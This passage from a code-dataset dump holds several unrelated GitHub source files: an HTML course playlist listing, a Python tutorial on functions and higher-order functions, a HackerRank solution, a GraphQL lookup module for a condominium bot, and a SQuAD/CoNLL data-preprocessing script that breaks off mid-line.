\"name\": \"Parágrafos e Quebras - HTML\",\n \"badge\": None,\n \"urls\": [{\n \"name\": \"Parágrafos e Quebras - HTML\",\n \"url\": \"https://www.youtube.com/watch?v=f6NTJdtEFOc&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=13\"\n }],\n \"sugg_prevs\": [64],\n \"sugg_nexts\": []\n }, # 65\n {\n \"name\": \"Símbolos e Emojis - HTML\",\n \"badge\": None,\n \"urls\": [{\n \"name\": \"Símbolos e Emojis - HTML\",\n \"url\": \"https://www.youtube.com/watch?v=nhMdFe3WwYc&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=14\"\n }],\n \"sugg_prevs\": [65],\n \"sugg_nexts\": []\n }, # 66\n {\n \"name\": \"Direitos de imagem: Copyright vs Creative Commons - HTML\",\n \"badge\": None,\n \"urls\": [{\n \"name\": \"Direitos de imagem: Copyright vs Creative Commons - HTML\",\n \"url\": \"https://www.youtube.com/watch?v=bDULqeGEvAw&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=15\"\n }],\n \"sugg_prevs\": [66],\n \"sugg_nexts\": []\n }, # 67\n {\n \"name\": \"Formatos de Imagem - HTML\",\n \"badge\": None,\n \"urls\": [{\n \"name\": \"Formatos de Imagem - HTML\",\n \"url\": \"https://www.youtube.com/watch?v=xg-vHgLF0mI&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=16\"\n }],\n \"sugg_prevs\": [67],\n \"sugg_nexts\": []\n }, # 68\n {\n \"name\": \"Tamanhos de Imagens - HTML\",\n \"badge\": None,\n \"urls\": [{\n \"name\": \"Tamanhos de Imagens - HTML\",\n \"url\": \"https://www.youtube.com/watch?v=8rkuukKA8a4&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=17\"\n }],\n \"sugg_prevs\": [68],\n \"sugg_nexts\": []\n }, # 69\n {\n \"name\": \"A tag img - HTML\",\n \"badge\": None,\n \"urls\": [{\n \"name\": \"A tag img - HTML\",\n \"url\": \"https://www.youtube.com/watch?v=CwOmEetWMnU&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=18\"\n }],\n \"sugg_prevs\": [69],\n \"sugg_nexts\": []\n }, # 70\n {\n \"name\": \"Alterar Favicon de um site - HTML\",\n \"badge\": None,\n \"urls\": [{\n \"name\": \"Alterar Favicon de um site - HTML\",\n \"url\": \"https://www.youtube.com/watch?v=1ZeettFfxys&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=19\"\n }],\n \"sugg_prevs\": [70],\n \"sugg_nexts\": []\n }, # 71\n {\n \"name\": \"Hierarquia de títulos - HTML\",\n \"badge\": None,\n \"urls\": [{\n \"name\": 
\"Hierarquia de títulos - HTML\",\n \"url\": \"https://www.youtube.com/watch?v=aiOEBhozEOg&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=20\"\n }],\n \"sugg_prevs\": [71],\n \"sugg_nexts\": []\n }, # 72\n {\n \"name\": \"Semântica na HTML5 - HTML\",\n \"badge\": None,\n \"urls\": [{\n \"name\": \"Semântica na HTML5 - HTML\",\n \"url\": \"https://www.youtube.com/watch?v=HaSgt1hK2Fs&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=21\"\n }],\n \"sugg_prevs\": [72],\n \"sugg_nexts\": []\n }, # 73\n {\n \"name\": \"Negrito e Itálico - HTML\",\n \"badge\": None,\n \"urls\": [{\n \"name\": \"Negrito e Itálico - HTML\",\n \"url\": \"https://www.youtube.com/watch?v=T-d_hsO3hUI&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=22\"\n }],\n \"sugg_prevs\": [73],\n \"sugg_nexts\": []\n }, # 74\n {\n \"name\": \"Formatações adicionais - HTML\",\n \"badge\": None,\n \"urls\": [{\n \"name\": \"Formatações adicionais - HTML\",\n \"url\": \"https://www.youtube.com/watch?v=8TgKFYkcO5Y&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=23\"\n }],\n \"sugg_prevs\": [74],\n \"sugg_nexts\": []\n }, # 75\n {\n \"name\": \"Citações e Códigos - HTML\",\n \"badge\": None,\n \"urls\": [{\n \"name\": \"Citações e Códigos - HTML\",\n \"url\": \"https://www.youtube.com/watch?v=4ynvsrkamt8&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=24\"\n }],\n \"sugg_prevs\": [75],\n \"sugg_nexts\": []\n }, # 76\n {\n \"name\": \"Lista OL e UL - HTML\",\n \"badge\": None,\n \"urls\": [{\n \"name\": \"Lista OL e UL - HTML\",\n \"url\": \"https://www.youtube.com/watch?v=JlE0pzESf5g&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=25\"\n }],\n \"sugg_prevs\": [76],\n \"sugg_nexts\": []\n }, # 77\n {\n \"name\": \"Listas mistas e de definição - HTML\",\n \"badge\": None,\n \"urls\": [{\n \"name\": \"Listas mistas e de definição - HTML\",\n \"url\": \"https://www.youtube.com/watch?v=Ez1kgIyoGuE&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=26\"\n }],\n \"sugg_prevs\": [77],\n \"sugg_nexts\": []\n }, # 78\n {\n \"name\": \"Links e Âncoras em HTML5 - HTML\",\n \"badge\": None,\n \"urls\": [{\n \"name\": \"Links e Âncoras em HTML5 - HTML\",\n \"url\": \"https://www.youtube.com/watch?v=LeOVXQDsAIY&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=27\"\n }],\n \"sugg_prevs\": [78],\n \"sugg_nexts\": []\n }, # 79\n {\n \"name\": \"Links internos - HTML\",\n \"badge\": None,\n \"urls\": [{\n \"name\": \"Links internos - HTML\",\n \"url\": \"https://www.youtube.com/watch?v=LeLnlT-ZKw8&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=28\"\n }],\n \"sugg_prevs\": [79],\n \"sugg_nexts\": []\n }, # 80\n {\n \"name\": \"Links para download - HTML\",\n \"badge\": None,\n \"urls\": [{\n \"name\": \"Links para download - HTML\",\n \"url\": \"https://www.youtube.com/watch?v=Jszz7M676y8&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=29\"\n }],\n \"sugg_prevs\": [80],\n \"sugg_nexts\": []\n }, # 81\n {\n \"name\": \"Desafios propostos - HTML\",\n \"badge\": None,\n \"type\": 1,\n \"urls\": [{\n \"name\": \"Desafios propostos - HTML\",\n \"url\": \"https://www.youtube.com/watch?v=suL56Mdx22Y&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=30\"\n }],\n \"sugg_prevs\": [81],\n \"sugg_nexts\": []\n }, # 82\n {\n \"name\": \"Imagens dinâmicas - HTML\",\n \"badge\": None,\n \"urls\": [{\n \"name\": \"Imagens dinâmicas - HTML\",\n \"url\": \"https://www.youtube.com/watch?v=E01LDVj0Rpg&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=31\"\n }],\n \"sugg_prevs\": [82],\n \"sugg_nexts\": []\n }, # 83\n {\n \"name\": \"Imagens que se adaptam sozinhas - HTML\",\n \"badge\": None,\n \"urls\": 
[{\n      \"name\": \"Imagens que se adaptam sozinhas - HTML\",\n      \"url\": \"https://www.youtube.com/watch?v=cAgkwPWE4hU&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=32\"\n    }],\n    \"sugg_prevs\": [83],\n    \"sugg_nexts\": []\n  }, # 84\n  {\n    \"name\": \"Adicionando áudio ao site - HTML\",\n    \"badge\": None,\n    \"urls\": [{\n      \"name\": \"Adicionando áudio ao site - HTML\",\n      \"url\": \"https://www.youtube.com/watch?v=4OZYsFl-J9s&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=33\"\n    }],\n    \"sugg_prevs\": [84],\n    \"sugg_nexts\": []\n  }, # 85\n  {\n    \"name\": \"Formatos de vídeo para seu site - HTML\",\n    \"badge\": None,\n    \"urls\": [{\n      \"name\": \"Formatos de vídeo para seu site - HTML\",\n      \"url\": \"https://www.youtube.com/watch?v=DjOSM72cYac&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=34\"\n    }],\n    \"sugg_prevs\": [85],\n    \"sugg_nexts\": []\n  }, # 86\n  {\n    \"name\": \"Vídeos em hospedagem própria - HTML\",\n    \"badge\": None,\n    \"urls\": [{\n      \"name\": \"Vídeos em hospedagem própria - HTML\",\n      \"url\": \"https://www.youtube.com/watch?v=TCeyIwFGkYo&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=35\"\n    }],\n    \"sugg_prevs\": [86],\n    \"sugg_nexts\": []\n  }, # 87\n  {\n    \"name\": \"Incorporação de vídeos externos - HTML\",\n    \"badge\": None,\n    \"urls\": [{\n      \"name\": \"Incorporação de vídeos externos - HTML\",\n      \"url\": \"https://www.youtube.com/watch?v=3hng-hmSv2Y&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=36\"\n    }],\n    \"sugg_prevs\": [87],\n    \"sugg_nexts\": []\n  }, # 88\n  {\n    \"name\": \"Criar um site em vídeo - HTML\",\n    \"badge\": \"HTML\",\n    \"type\": 1, # 0: Subject, 1: Exercise (Exercises don't appear in search results, unlike Subjects or Badges)\n    \"urls\": [{\n      \"name\": \"Criar um site em vídeo - HTML\",\n      \"url\": \"https://www.youtube.com/watch?v=gqrySQQzvvQ&list=PLHz_AreHm4dkZ9-atkcmcBaMZdmLHft8n&index=37\"\n    }],\n    \"sugg_prevs\": [88],\n    \"sugg_nexts\": []\n  }, # 89\n]\n\nfrom utils.upload_caminhos import create_subject_from_file\ncreate_subject_from_file(html)\n","repo_name":"rubensgaguiar/caminhos-api","sub_path":"subjects/011_caminhos.py","file_name":"011_caminhos.py","file_ext":"py","file_size_in_byte":10849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} {"seq_id":"2798004489","text":"# # Rock-paper-scissors game\n# import random\n# c = ['rock', 'scissors', 'paper']\n# while True:\n#     a = input('Your move: 0-rock 1-scissors 2-paper, or quit (q): ')\n#     if a in ['0', '1', '2']:\n#         a = int(a)\n#         b = random.randint(0, 2)\n#         if (a == 0 and b == 1) or (a == 1 and b == 2) or (a == 2 and b == 0):\n#             print(f'Player plays {c[a]}, computer plays {c[b]}, player wins')\n#         elif a == b:\n#             print(f'Player plays {c[a]}, computer plays {c[b]}, draw')\n#         else:\n#             print(f'Player plays {c[a]}, computer plays {c[b]}, computer wins')\n#     elif a in ['q', 'Q']:\n#         d = input('Are you sure you want to quit (y/n): ')\n#         if d == 'y' or d == 'Y':\n#             print()\n#             break\n#     else:\n#         print('Invalid input, please try again')\n\n\n# 9x9 multiplication table\n# Use an outer while loop to print the nine rows\na = 1\nwhile a <= 9:\n    # print(f'This is row {a}')\n    # todo fill in the content of each row\n    col = 1\n    while col <= a:\n        print(f'{col}*{a}={col*a}', end='\\t')\n        col += 1\n    print()\n    a += 1\n# The same table with for loops\nfor a in range(1, 10):\n    for col in range(1, a+1):\n        print(f'{col}*{a}={col*a}', end='\\t')\n    print()\n\n# Ways to exit a loop (a short demo follows the function examples below)\n# while..else\n# while..break..else\n# while..continue..else\n# for..else\n# for..break..else\n# for..continue..else\n\n# Functions\n# Define a function > then call it\n# def func(params) > func(params)\n\n\ndef s1(b, c):\n    d = b + c\n    print(d)\n\n\ns1(3, 4) # 7\n\n\ndef s2():\n    \"\"\"\n    The text between triple single or double quotes documents the function\n    :return:\n    \"\"\"\n    return 404 # return also terminates the function; code after return never runs\n    print('this function has ended')\n\n\nn = s2() # n holds the return value of s2; if n is None, the function returned nothing\nprint(n) # 404\nprint(s1(3, 4)) # 7 then None (s1 prints its result first; its return value is None)
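\n\n# Quick demo of the loop-exit patterns listed earlier: the else clause of\n# a for/while loop runs only when the loop finishes without hitting break.\nfor i in range(3):\n    if i == 10:\n        break\nelse:\n    print('loop finished without break') # loop finished without break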
\n\n\ndef print_one_line():\n    print('-'*10)\n\n\nprint_one_line() # ----------\n\n\ndef print_lines(n):\n    i = 1\n    while i <= n:\n        print_one_line()\n        i += 1\n\n\nprint_lines(5)\n\n\n# To modify a global variable inside a function, declare it with global, then call the function\na = 3\n\n\ndef s3():\n    global a\n    a = 5\n    print(a)\n\n\ns3()\nprint(a)\n\n# Function parameters\n# 1. Positional parameters\ndef user_info(name, age, gender):\n    print(f'Your name is {name}, age is {age}, gender is {gender}')\n\n\nuser_info('tortoise', 25, 'male') # Your name is tortoise, age is 25, gender is male\n# 2. Keyword arguments: passed at call time as 'key=value'\ndef user_info(name, age, gender):\n    print(f'Your name is {name}, age is {age}, gender is {gender}')\n\n\nuser_info(gender='female', age=17, name='zouzou') # Your name is zouzou, age is 17, gender is female\n# When calling, positional arguments must come before keyword arguments, but keyword arguments have no order among themselves\n# 3. Default parameters: give a parameter a default value in the definition; callers may omit it (all positional parameters must come before default ones, in both definition and call)\ndef user_info(name, age, gender='female'):\n    print(f'Your name is {name}, age is {age}, gender is {gender}')\n\n\n# Call using the default, without passing gender\nuser_info('zouzou', 18) # Your name is zouzou, age is 18, gender is female\n# Call overriding the default; keyword arguments may come in any order as long as they follow the positional ones\nuser_info('tom', gender='male', age=20) # Your name is tom, age is 20, gender is male\n# 4. Variadic parameters: for when you do not know how many arguments will be passed (possibly none); they pack positional or keyword arguments, which is very convenient\n# a. Packing positional arguments: *args packs them into a tuple; * unpacks\ndef user_info(*args):\n    print(args)\n\n\n# Defined with *args, called with positional arguments\nuser_info('Tom') # ('Tom',)\nuser_info() # ()\nuser_info('Tom', 90) # ('Tom', 90)\n# b. Packing keyword arguments: **kwargs packs them into a dict; ** unpacks kwargs\ndef user_info(**kwargs):\n    print(kwargs)\n\n\n# Defined with **kwargs, called with keyword arguments\nuser_info(name='Tom', age=25, gender='male') # {'name': 'Tom', 'age': 25, 'gender': 'male'}\n\n# Unpacking\n# Tuple unpacking maps to positional parameters\n# Dict unpacking maps to keys\n\n# Mutable vs immutable data types (whether the data can be modified in place)\n# Mutable: list, dict, set\n# Immutable: int, str, tuple\n\ndef extendList(val, list=[]):\n    list.append(val)\n    return list\n\n\nlist1 = extendList(10) # [10]\nprint(\"list1=%s\"%list1) # [10]\nlist2 = extendList(123, []) # [123] ==> list2 = extendList(123, list=[]) replaces the default argument\nlist3 = extendList('a') # [10, 'a'] (the shared default list keeps its state)\nprint(\"list1=%s\"%list1) # [10, 'a']\nprint(\"list2=%s\"%list2) # [123]\nprint(\"list3=%s\"%list3) # [10, 'a']\n\n# lambda syntax = anonymous function; if a function returns a single expression in one line, lambda can simplify it\n# lambda params: expression\n# lambda parameters are optional; everything that works for function parameters works in lambda\n# a lambda can take any number of arguments but returns the value of a single expression\n# supports no parameters, one parameter, defaults, *args and **kwargs\nprint((lambda a, b: a + b)(10, 20)) # 30\nfn = lambda a, b, c=100: a+b+c\nprint(fn(40, 20)) # 160\nprint((lambda a, b: True if a > b else False)(100, 150)) # False\n\nstudents = [\n    {'name': 'TOM', 'age': 20},\n    {'name': 'ROSE', 'age': 19},\n    {'name': 'jack', 'age': 24}\n]\n# list.sort(key=None, reverse=False) sorts ascending by default\nstudents.sort(key=lambda x:x['name'])\nprint(students) # [{'name': 'ROSE', 'age': 19}, {'name': 'TOM', 'age': 20}, {'name': 'jack', 'age': 24}]\nstudents.sort(key=lambda x:x['name'], reverse=True)\nprint(students) # [{'name': 'jack', 'age': 24}, {'name': 'TOM', 'age': 20}, {'name': 'ROSE', 'age': 19}]\nstudents.sort(key=lambda x:x['age'])\nprint(students) # [{'name': 'ROSE', 'age': 19}, {'name': 'TOM', 'age': 20}, {'name': 'jack', 'age': 24}]\n\n# Higher-order functions\n# Task: a function that sums the absolute values of two arbitrary numbers; abs() gives the absolute value\ndef add_num(a, b):\n    return abs(a) + abs(b)\nprint(add_num(1,-4)) # 5\n\ndef add_nums(a, b, f):\n    return f(a) + f(b)\nprint(add_nums(-3, 5, abs)) # 8\n# Functional style reuses functions heavily and reduces duplication, so programs are shorter and faster to develop\n\n# Built-in higher-order functions\n# 1. map() applies the given function to every element of the given sequence(s)\n# The first argument, function, is called with each element, and map returns the results; use list() to turn the result into a list\n# Syntax: map(function, iterable, ...)\n# Params: function: a function; iterable: one or more sequences\n# Return value: in Python 3, map returns an iterator\nlist1 = [7, 10, 13, 2]\nresult = map(lambda x: x*2, list1)\nprint(result) # <map object at 0x...>\nlist2 = list(result)\nprint(list2) # [14, 20, 26, 4]
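\n# map can also walk several sequences in parallel, pairing elements positionally:\nprint(list(map(lambda x, y: x + y, [1, 2, 3], [10, 20, 30]))) # [11, 22, 33]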
\n\n# 2. reduce()\n# reduce(func(x, y), list) accumulates over the elements of the sequence; func must take two parameters, and each result of func is combined with the next element of the sequence\n# a. The func passed to reduce() must accept exactly 2 parameters\n# b. reduce has to be imported from functools\n# Task: compute the cumulative sum of the numbers in list1\nfrom functools import reduce\nlist1 = [3, 5, 6, 4, 7]\nresult = reduce(lambda x, y: x+y, list1)\nprint(result) # 25\n\n# 3. filter()\n# filter(func, list) filters a sequence, dropping elements that do not satisfy the condition, and returns a filter object; use list() to turn it into a list\n# Task: keep the even numbers in the list\nlist2 = [1, 2, 2, 3, 4, 7, 14, 6]\nprint(list(filter(lambda x: x % 2 == 0, list2))) # [2, 2, 4, 14, 6]\ndef func(x):\n    return x % 2 == 0\nresult = filter(func, list2)\nprint(result) # <filter object at 0x...>\nprint(list(result)) # [2, 2, 4, 14, 6]\n\n\n","repo_name":"Toetoise/python_test","sub_path":"lesson3.py","file_name":"lesson3.py","file_ext":"py","file_size_in_byte":8009,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} {"seq_id":"5548499809","text":"def average(array):\n    distinct = set(array)\n    total = 0\n    for item in distinct:\n        total += item\n    avg = total / len(distinct)\n    return avg\n\n\nif __name__ == '__main__':\n    n = int(input())\n    arr = list(map(int, input().split()))\n    result = average(arr)\n    print(result)\n","repo_name":"rifatrakib/hackerrank","sub_path":"Python/Sets.py","file_name":"Sets.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} {"seq_id":"8664657671","text":"\"\"\"\nCheck information about condominium\n\"\"\"\n\nimport logging\nimport os\nimport requests\n\nfrom settings import PATH, LOG_NAME, API_TOKEN\n\nlogger = logging.getLogger(LOG_NAME)\n\nclass CheckCondo:\n    \"\"\"\n    Check information about blocks and apartments\n    \"\"\"\n\n    def block(block):\n        \"\"\"\n        Check block information\n        \"\"\"\n\n        logger.debug(\"Checking if the informed block exists in database\")\n        query = \"\"\"\n        query block($number: String!){\n            block(number: $number){\n                number\n            }\n        }\n        \"\"\"\n\n        variables = {\n            'number': block\n        }\n\n        headers = {\n            'Authorization': 'JWT %s' % API_TOKEN\n        }\n\n        response = requests.post(\n            PATH,\n            headers=headers,\n            json={'query': query, 'variables':variables}\n        )\n        logger.debug(f\"Response: {response.json()}\")\n\n        return response.json()\n\n    def apartment(block, apartment):\n        \"\"\"\n        Check apartment information\n        \"\"\"\n        logger.debug(\"Checking if the informed apartment exists in database\")\n        query = \"\"\"\n        query apartment($number: String!, $block: String!){\n            apartment(number: $number, block: $block){\n                number\n                block{\n                    number\n                }\n            }\n        }\n        \"\"\"\n\n        variables = {\n            'number': apartment,\n            'block': block\n        }\n\n        headers = {\n            'Authorization': 'JWT %s' % API_TOKEN\n        }\n\n        response = requests.post(\n            PATH,\n            headers=headers,\n            json={'query': query, 'variables':variables}\n        )\n        logger.debug(f\"Response: {response.json()}\")\n\n        return response.json()\n\nclass CheckResident:\n    \"\"\"\n    Check resident information\n    \"\"\"\n\n    def email(email):\n        \"\"\"\n        Check email information\n        \"\"\"\n\n        logger.debug(\"Checking if the informed email exists in database\")\n        query = \"\"\"\n        query resident($email: String!){\n            resident(email: $email){\n                completeName\n            }\n        }\n        \"\"\"\n\n        variables = {\n            'email': email\n        }\n\n        headers = {\n            'Authorization': 'JWT %s' % API_TOKEN\n        }\n\n        response = requests.post(\n            PATH,\n            headers=headers,\n            json={'query': query, 'variables':variables}\n        )\n        logger.debug(f\"Response: {response.json()}\")\n\n        return response.json()\n\n    def cpf(cpf):\n        \"\"\"\n        Check cpf information\n        \"\"\"\n\n        
logger.debug(\"Checking if the informed CPF exists in database\")\n query = \"\"\"\n query resident($cpf: String!){\n resident(cpf: $cpf){\n completeName\n\n }\n }\n \"\"\"\n\n variables = {\n 'cpf': cpf\n }\n\n headers = {\n 'Authorization': 'JWT %s' % API_TOKEN\n }\n\n response = requests.post(\n PATH,\n headers=headers,\n json={'query': query, 'variables':variables}\n )\n logger.debug(f\"Response: {response.json()}\")\n\n return response.json()\n\n\nclass CheckVisitor:\n \"\"\"\n check visitor data\n \"\"\"\n\n def cpf(cpf):\n \"\"\"\n Check if cpf is valid\n \"\"\"\n\n logger.debug(\"Checking if the informed CPF of visitor exists in database\")\n query = \"\"\"\n query visitor($cpf: String!){\n visitor(cpf: $cpf){\n completeName\n }\n }\n \"\"\"\n\n variables = {\n 'cpf': cpf\n }\n\n headers = {\n 'Authorization': 'JWT %s' % API_TOKEN\n }\n\n response = requests.post(\n PATH,\n headers=headers,\n json={'query': query, 'variables':variables}\n )\n logger.debug(f\"Response: {response.json()}\")\n\n return response.json()\n\nclass CheckAdmin:\n \"\"\"\n Check admin information\n \"\"\"\n\n def email(email):\n \"\"\"\n Check if admin email exists in database\n \"\"\"\n\n logger.debug(\"Checking if the informed email exists in database\")\n query = \"\"\"\n query admin($adminEmail: String!){\n admin(adminEmail: $adminEmail){\n admin {\n email\n }\n }\n }\n \"\"\"\n\n variables = {\n 'adminEmail': email\n }\n\n headers = {\n 'Authorization': 'JWT %s' % API_TOKEN\n }\n\n response = requests.post(\n PATH,\n headers=headers,\n json={'query': query, 'variables':variables}\n )\n logger.debug(f\"Response: {response.json()}\")\n\n return response.json()\n","repo_name":"Alohomora-team/2019.2-AlohomoraBot","sub_path":"bot/checks.py","file_name":"checks.py","file_ext":"py","file_size_in_byte":5059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"23226536987","text":"import logging\nimport os\nimport importlib.util\nfrom itertools import islice\nfrom subprocess import call\nimport json\nfrom itertools import groupby\nfrom collections import defaultdict\n\nimport numpy as np\nimport spacy\nimport nltk\nfrom spacy.lang.en import English\nfrom nltk.parse.corenlp import CoreNLPParser\nfrom tqdm import tqdm\n\nimport evaluate\n\nlogging.basicConfig(level=logging.INFO)\n\nBASEDIR = os.path.join(os.path.dirname(__file__), '.')\n\nnlp = spacy.load('en')\nspacy_tokenizer = English().Defaults.create_tokenizer(nlp)\nstanford_tokenizer = CoreNLPParser()\n\n\ndef index_by_starting_character(text, tokens):\n \"\"\"\n Given a string of text and a list of its tokens produce a dict where the keys are the character start\n positions of the tokens and the values are [token, index] where index denotes the position of the token\n in the text.\n \"\"\"\n seen = ''\n current_token_id = 0\n token_map = dict()\n for char_id, char in enumerate(text):\n if char != u' ':\n seen += char\n context_token = tokens[current_token_id]\n if seen == context_token:\n syn_start = char_id - len(seen) + 1\n token_map[syn_start] = [seen, current_token_id]\n seen = ''\n current_token_id += 1\n return token_map\n\n\ndef tokenize(text, tokenizer):\n \"\"\"\n Tokenize text into a list of tokens using one of the following tokenizers:\n - nltk\n - spacy\n - stanford\n \"\"\"\n if tokenizer == 'nltk':\n tokens = ['\"' if token in {'``', '\\'\\''} else token for token in nltk.word_tokenize(text)]\n elif tokenizer == 'spacy':\n tokens = [word.text for word in spacy_tokenizer(text)]\n elif 
tokenizer == 'stanford':\n tokens = list(stanford_tokenizer.tokenize(text))\n else:\n raise ValueError('tokenizer param must be one of the following: nltk|spacy|stanford')\n return tokens\n\n\ndef fix_double_quotes(text):\n \"\"\"\n Given some text standardize all its double quotes by replacing them with the standard double quote symbol.\n \"\"\"\n ans = text.replace(\"''\", '\" ')\n ans = ans.replace(\"``\", '\" ')\n return ans\n\n\ndef fix_whitespace(text):\n \"\"\"\n Remove all non-single spaces from text.\n \"\"\"\n return ' '.join([x for x in [x.strip() for x in text.split(' ')] if x != ''])\n\n\ndef make_squad_examples(data,\n tokenizer,\n word2id,\n name=None,\n max_context_len=300,\n max_answer_len=10,\n max_question_len=20,\n ):\n \"\"\"\n Given a SQuAD dataset, builds a list of example dicts (see implementation).\n \"\"\"\n examples = []\n total = 0\n total_passed = 0\n skipped = defaultdict(lambda: 0)\n span2position = make_span2position(\n seq_size=max_context_len,\n max_len=max_answer_len\n )\n position2span = {v: k for k, v in span2position.items()}\n\n for line in tqdm(data['data'], desc=name):\n title = line['title']\n\n for paragraph in line['paragraphs']:\n # Extract context\n context = paragraph['context']\n context = fix_double_quotes(context)\n context_tokens = tokenize(context, tokenizer=tokenizer)\n\n if max_context_len and len(context_tokens) > max_context_len:\n skipped['context too long'] += len(paragraph['qas'])\n total += len(paragraph['qas'])\n continue\n\n answer_map = index_by_starting_character(context, context_tokens)\n\n for qa in paragraph['qas']:\n # Extract question\n question = qa['question']\n question = fix_double_quotes(question)\n question_tokens = tokenize(question, tokenizer=tokenizer)\n\n # Extract answer\n answer = qa['answers'][0]['text']\n answer = fix_double_quotes(answer)\n answer_tokens = tokenize(answer, tokenizer=tokenizer)\n\n if max_answer_len and len(answer_tokens) > max_answer_len:\n skipped['answer too long'] += 1\n total += 1\n continue\n\n answer_start = qa['answers'][0]['answer_start']\n answer_end = answer_start + len(answer)\n\n # Find answer span\n try:\n last_word_answer = len(answer_tokens[-1]) # add one to get the first char\n\n _, span_start = answer_map[answer_start] # start token index\n _, span_end = answer_map[answer_end - last_word_answer]\n\n extracted_answer = context_tokens[span_start:span_end + 1]\n extracted_answer = ' '.join(extracted_answer)\n extracted_answer = evaluate.normalize_answer(extracted_answer)\n\n actual_clean = evaluate.normalize_answer(answer)\n\n assert extracted_answer == actual_clean, f'{extracted_answer} != {actual_clean}'\n\n span_positions = [span2position[(span_start, span_end)]]\n\n s, e = position2span[span_positions[0]]\n assert ' '.join(context_tokens[s:e+1]) == ' '.join(answer_tokens), \\\n 'Extracted span does not match answer'\n\n correct_spans = np.asarray(list({\n k: v for\n k, v in\n span2position.items()\n if np.all(np.asarray(k) < len(context_tokens))\n }.values()))\n span_mask = np.zeros(len(span2position))\n span_mask[correct_spans] = 1\n\n example = {\n 'title': title,\n 'context_raw': context_tokens,\n 'question_raw': question_tokens,\n 'answer_raw': answer_tokens,\n 'context': pad_seq([word2id[w] for w in context_tokens], maxlen=max_context_len),\n 'question': pad_seq([word2id[w] for w in question_tokens], maxlen=max_question_len),\n 'answer': pad_seq([word2id[w] for w in answer_tokens], maxlen=max_answer_len),\n 'context_len': len_or_maxlen(context_tokens, 
max_context_len),\n                        'question_len': len_or_maxlen(question_tokens, max_question_len),\n                        'answer_len': len_or_maxlen(answer_tokens, max_answer_len),\n                        'starts': [span_start],\n                        'ends': [span_end],\n                        'span_positions': span_positions,\n                        'span_mask': span_mask,\n                        'label': np.asarray([1 if x in span_positions else 0 for x in span2position.values()])\n                    }\n\n                    total_passed += 1\n                    total += 1\n\n                    examples.append(example)\n\n                except (AssertionError, KeyError) as e:\n                    skipped['error finding span'] += 1\n                    total += 1\n                    continue\n\n    total_skipped = sum(skipped.values())\n    ratio_skipped = total_skipped/total if total != 0 else 0\n    logging.info(f'max_context_len: {max_context_len}')\n    logging.info(f'max_answer_len: {max_answer_len}')\n    logging.info(f'skipped {skipped}/{total}\\t({ratio_skipped})')\n    print(json.dumps(skipped, indent=4))\n    print(f'ratio skipped: {ratio_skipped}')\n    print(f'{total_passed} examples PASSED')\n    return examples\n\n\ndef len_or_maxlen(seq, maxlen):\n    return len(seq) if len(seq) <= maxlen else maxlen\n\n\ndef make_conll_examples(\n        data,\n        questions,\n        word2id,\n        name=None,\n        max_context_len=300,\n        max_answer_len=10,\n        max_question_len=20\n):\n    \"\"\"\n    Given a CoNLL dataset, builds a list of example dicts (see implementation).\n    \"\"\"\n\n    span2position = make_span2position(\n        seq_size=max_context_len,\n        max_len=max_answer_len\n    )\n\n    examples = []\n\n    for i, line in tqdm(enumerate(data), desc=name):\n        context_tokens = [x[0] for x in line]\n        labels = [x[1] for x in line]\n\n        for label, question in questions[i].items():\n            if max_context_len and len(context_tokens) > max_context_len:\n                # context_tokens = context_tokens[:max_context_len]\n                continue\n            question_tokens = question.split()\n            indicators = [1 if x == label else 0 for x in labels]\n\n            span_starts = []\n            span_ends = []\n\n            # e.g. labels ['O','PER','PER','O'] with label 'PER' give indicators\n            # [0,1,1,0] -> one span with start=1, end=2\n            for k, g in groupby(enumerate(indicators), lambda ix: ix[1]):\n                if k == 1:\n                    res = list(g)\n                    if max_answer_len and len(res) > max_answer_len:\n                        continue\n                    span_starts.append(res[0][0])\n                    span_ends.append(res[-1][0])\n\n            span_positions = [span2position[(s, e)] for s, e in zip(span_starts, span_ends)]\n\n            answer_tokens = [token for s, e in zip(span_starts, span_ends) for token in context_tokens[s:e+1]]\n\n            example = {\n                'title': '',\n                'context_raw': context_tokens,\n                'question_raw': question_tokens,\n                'answer_raw': answer_tokens,\n                'context': pad_seq([word2id[w] for w in context_tokens], maxlen=max_context_len),\n                'question': pad_seq([word2id[w] for w in question_tokens], maxlen=max_question_len),\n                'answer': pad_seq([word2id[w] for w in answer_tokens], maxlen=max_answer_len),\n                'context_len': len_or_maxlen(context_tokens, max_context_len),\n                'question_len': len_or_maxlen(question_tokens, max_question_len),\n                'answer_len': len_or_maxlen(answer_tokens, max_answer_len),\n                'starts': span_starts,\n                'ends': span_ends,\n                'span_positions': span_positions,\n                'label': np.asarray([1 